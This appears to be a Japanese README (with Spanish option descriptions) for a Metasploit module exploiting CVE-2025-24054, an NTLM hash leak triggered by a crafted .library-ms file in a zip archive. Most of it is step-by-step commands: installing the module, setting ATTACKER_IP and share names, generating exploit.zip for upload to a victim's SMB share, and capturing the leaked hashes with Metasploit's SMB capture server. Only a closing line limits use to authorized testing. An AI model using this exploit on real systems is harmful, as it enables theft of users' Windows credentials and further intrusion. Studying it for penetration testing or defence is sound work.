
CVE-2025-24054 (旧24071) を悪用するためのMetasploitモジュール。Windowsライブラリベースの攻撃ベクトル向けにMetasploitに統合されたNTLM漏洩エクスプロイト。
脆弱性は、.zip ファイルの抽出プロセス中に発生します。特別に細工された .library-ms ファイルと対話する際、Windows エクスプローラーは内部の XML スキーマを処理し、攻撃者が制御するリモートパスへの SMB 認証要求を自動的に開始します。
この動作により、ファイルの解凍以外の追加の操作を必要とせずに、ユーザーの NTLM ハッシュが流出する可能性があります。概念実証については、次のリンクを参照することをお勧めします: Fluffy - HTB。
この脆弱性は元々 CVE-2025-24071 として公開されましたが、現在は正式に CVE-2025-24054 として追跡されています。
リポジトリをクローンする:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
モジュールを Metasploit ディレクトリにコピーする:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
ディレクトリが存在しない場合は、次のコマンドで作成する:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
その後、再度モジュールをコピーする。
Metasploit を起動し、モジュールをロードする:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
モジュールが正しくロードされると、設定オプションが表示されます:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP del atacante (donde corre Responder/Impacket)
FILENAME exploit.zip yes El nombre del archivo ZIP
LIBRARY_NAME documents.library-ms yes Nombre del archivo .library-ms
SHARE_NAME recurso yes Nombre del recurso compartido ficticio
モジュールを設定して実行する:
❯ set ATTACKER_IP 0.0.0.0 # Reemplaza con tu IP atacante
❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo)
❯ set LIBRARY_NAME malicious.library-ms # Nombre de .library-ms file
❯ set SHARE_NAME it_shared # Nombre del recurso SMB
❯ run
出力: モジュールは .zip ファイルを生成し、それを対象の SMB サーバーにアップロードして、被害者側で実行させる必要があります。
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
最後に、Metasploit の SMB キャプチャモジュールを使用して NTLM ハッシュを受信します:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante
❯ run
Metasploit から SMB サーバーを起動する際に問題がある場合:
このモジュールは教育目的および許可されたテストのみを目的として開発されました。 この種のツールの無許可での使用は違法となる可能性があります。
Security Layer